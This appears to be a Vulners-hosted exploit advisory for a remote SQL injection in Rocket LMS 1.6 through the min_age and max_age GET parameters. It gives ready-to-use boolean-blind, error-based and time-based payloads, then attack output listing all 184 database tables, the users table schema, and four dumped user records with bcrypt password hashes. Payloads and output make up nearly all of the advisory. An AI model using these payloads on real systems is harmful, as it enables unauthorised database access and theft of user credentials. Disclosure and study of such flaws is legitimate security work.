Vulners
Lucene search
Rocket LMS 1.6 SQL Injection
`┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr │ │ :
│ Website : rocket-soft.org │ │ Rocket LMS - Learning Management System │
│ Vendor : RocketSoft │ │ │
│ Software : Rocket LMS v 1.6 │ │ is an online course marketplace with a │
│ Vuln Type: Remote SQL Injection │ │ pile of features that helps you to run │
│ Method : GET │ │ your online education business easily │
│ Impact : Database Access │ │ │
│ │ │ │
│────────────────────────────────────────────┘ └─────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL
Ivo @palaziv
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
GET parameter 'min_age' is vulnerable
---
Parameter: min_age (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=(SELECT (CASE WHEN (8536=8536) THEN 18 ELSE (SELECT 7625 UNION SELECT 1202) END))&max_age=99&day[]=saturday&min_time=&max_time=&country_id=
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(1687=1687,1))),0x71786a6a71),1687)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND (SELECT 2819 FROM (SELECT(SLEEP(5)))SBYp)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=
---
GET parameter 'max_age' is vulnerable
---
Parameter: max_age (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=(SELECT (CASE WHEN (2763=2763) THEN 99 ELSE (SELECT 3665 UNION SELECT 7462) END))&day[]=saturday&min_time=&max_time=&country_id=
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(5555=5555,1))),0x71786a6a71),5555)&day[]=saturday&min_time=&max_time=&country_id=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND (SELECT 2169 FROM (SELECT(SLEEP(5)))mngI)&day[]=saturday&min_time=&max_time=&country_id=
---
[+] Starting the Attack
[INFO] fetching current database
[INFO] the back-end DBMS is MySQL
web application technology: Apache 2, PHP 7.4.30
back-end DBMS: MySQL >= 5.6
current database: 'admin_learn'
[INFO] fetching tables for database: 'admin_learn'
Database: admin_learn
[184 tables]
+------------------------------------------------+
| groups |
| accounting |
| advertising_banners |
| advertising_banners_translations |
| affiliates |
| affiliates_codes |
| agora_history |
| badge_translations |
| badges |
| become_instructors |
| blog |
| blog_categories |
| blog_translations |
| bundle_filter_option |
| bundle_translations |
| bundle_webinars |
| bundles |
| cart |
| categories |
| category_translations |
| certificate_template_translations |
| certificates |
| certificates_templates |
| comments |
| comments_reports |
| contacts |
| course_forum_answers |
| course_forums |
| course_learning |
| course_noticeboard_status |
| course_noticeboards |
| delete_account_requests |
| discount_categories |
| discount_courses |
| discount_groups |
| discount_users |
| discounts |
| faq_translations |
| faqs |
| favorites |
| feature_webinar_translations |
| feature_webinars |
| file_translations |
| files |
| filter_option_translations |
| filter_options |
| filter_translations |
| filters |
| follows |
| forum_featured_topics |
| forum_recommended_topic_items |
| forum_recommended_topics |
| forum_topic_attachments |
| forum_topic_bookmarks |
| forum_topic_likes |
| forum_topic_posts |
| forum_topic_reports |
| forum_topics |
| forum_translations |
| forums |
| group_users |
| groups_registration_packages |
| home_sections |
| jazzcash_transactions |
| meeting_times |
| meetings |
| migrations |
| navbar_button_translations |
| navbar_buttons |
| newsletters |
| newsletters_history |
| noticeboards |
| noticeboards_status |
| notification_templates |
| notifications |
| notifications_status |
| offline_payments |
| order_items |
| orders |
| page_translations |
| pages |
| password_resets |
| payku_payments |
| payku_transactions |
| payment_channels |
| payouts |
| payu_transactions |
| permissions |
| prerequisites |
| product_categories |
| product_category_translations |
| product_discounts |
| product_faq_translations |
| product_faqs |
| product_file_translations |
| product_files |
| product_filter_option_translations |
| product_filter_options |
| product_filter_translations |
| product_filters |
| product_media |
| product_orders |
| product_reviews |
| product_selected_filter_options |
| product_selected_specification_multi_values |
| product_selected_specification_translations |
| product_selected_specifications |
| product_specification_categories |
| product_specification_multi_value_translations |
| product_specification_multi_values |
| product_specification_translations |
| product_specifications |
| product_translations |
| products |
| promotion_translations |
| promotions |
| purchases |
| quiz_question_translations |
| quiz_translations |
| quizzes |
| quizzes_questions |
| quizzes_questions_answer_translations |
| quizzes_questions_answers |
| quizzes_results |
| rating |
| regions |
| registration_packages |
| registration_packages_translations |
| reserve_meetings |
| rewards |
| rewards_accounting |
| roles |
| sales |
| sales_log |
| sections |
| session_reminds |
| session_translations |
| sessions |
| setting_translations |
| settings |
| special_offers |
| subscribe_reminds |
| subscribe_translations |
| subscribe_uses |
| subscribes |
| support_conversations |
| support_department_translations |
| support_departments |
| supports |
| tags |
| testimonial_translations |
| testimonials |
| text_lesson_translations |
| text_lessons |
| text_lessons_attachments |
| ticket_translations |
| ticket_users |
| tickets |
| trend_categories |
| users |
| users_badges |
| users_cookie_security |
| users_manual_purchase |
| users_metas |
| users_occupations |
| users_registration_packages |
| users_zoom_api |
| verifications |
| webinar_assignment_attachments |
| webinar_assignment_history |
| webinar_assignment_history_messages |
| webinar_assignment_translations |
| webinar_assignments |
| webinar_chapter_items |
| webinar_chapter_translations |
| webinar_chapters |
| webinar_extra_description_translations |
| webinar_extra_descriptions |
| webinar_filter_option |
| webinar_partner_teacher |
| webinar_reports |
| webinar_reviews |
| webinar_translations |
| webinars |
+------------------------------------------------+
[INFO] fetching columns for table 'users' in database 'admin_learn'
Database: admin_learn
Table: users
[49 columns]
+--------------------+-------------------------------------+
| Column | Type |
+--------------------+-------------------------------------+
| language | varchar(255) |
| about | text |
| access_content | tinyint(1) |
| account_id | varchar(128) |
| account_type | varchar(128) |
| address | varchar(255) |
| affiliate | tinyint(1) |
| avatar | varchar(255) |
| avatar_settings | varchar(255) |
| ban | tinyint(1) |
| ban_end_at | int(10) unsigned |
| ban_start_at | int(10) unsigned |
| bio | varchar(128) |
| can_create_store | tinyint(1) |
| certificate | varchar(128) |
| city_id | int(10) unsigned |
| commission | int(10) unsigned |
| country_id | int(10) unsigned |
| cover_img | varchar(255) |
| created_at | int(11) |
| deleted_at | int(11) |
| district_id | int(10) unsigned |
| email | varchar(255) |
| facebook_id | varchar(255) |
| financial_approval | tinyint(1) |
| full_name | varchar(128) |
| google_id | varchar(255) |
| headline | varchar(255) |
| iban | varchar(128) |
| id | int(10) unsigned |
| identity_scan | varchar(128) |
| level_of_training | bit(3) |
| location | point |
| meeting_type | enum('all','in_person','online') |
| mobile | varchar(32) |
| newsletter | tinyint(1) |
| offline | tinyint(1) |
| offline_message | text |
| organ_id | int(11) |
| password | varchar(255) |
| province_id | int(10) unsigned |
| public_message | tinyint(1) |
| remember_token | varchar(255) |
| role_id | int(10) unsigned |
| role_name | varchar(64) |
| status | enum('active','pending','inactive') |
| timezone | varchar(255) |
| updated_at | int(11) |
| verified | tinyint(1) |
+--------------------+-------------------------------------+
[INFO] fetching entries of column(s) 'account_id,account_type,email,id,password' for table 'users' in database 'admin_learn'
Database: admin_learn
Table: users
[4 entries]
+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+
| id | account_id | account_type | email | password |
+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+
| 1 | NULL | NULL | [email protected] | $2y$10$nSUg1Z2rltHGecudC6dEEeRoqfIhlHi8WaAFFQs57oyFtpkvvQufW |
| 867 | NULL | NULL | [email protected] | $2y$10$W0.rfZgYCWGr/rOSrGrGg.Nnm6xBVdR3FYjJiXqiq6LZdx2Ds.aXq |
| 995 | NULL | NULL | [email protected] | $2y$10$Hc4OzTkL3i5vmHXXvZvSfOsZDMD/XYwO4yS8UOtUIAFQcXYhIIJsa |
| 1015 | NULL | NULL | [email protected] | $2y$10$8.jgtS/cg8L6HfuuBgWnkeg49r0LiY7kofR6eiY9b.mx747i82n.u |
+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+
[-] Done
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Sep 2022 00:00Current
0.3Low risk
Vulners AI Score0.3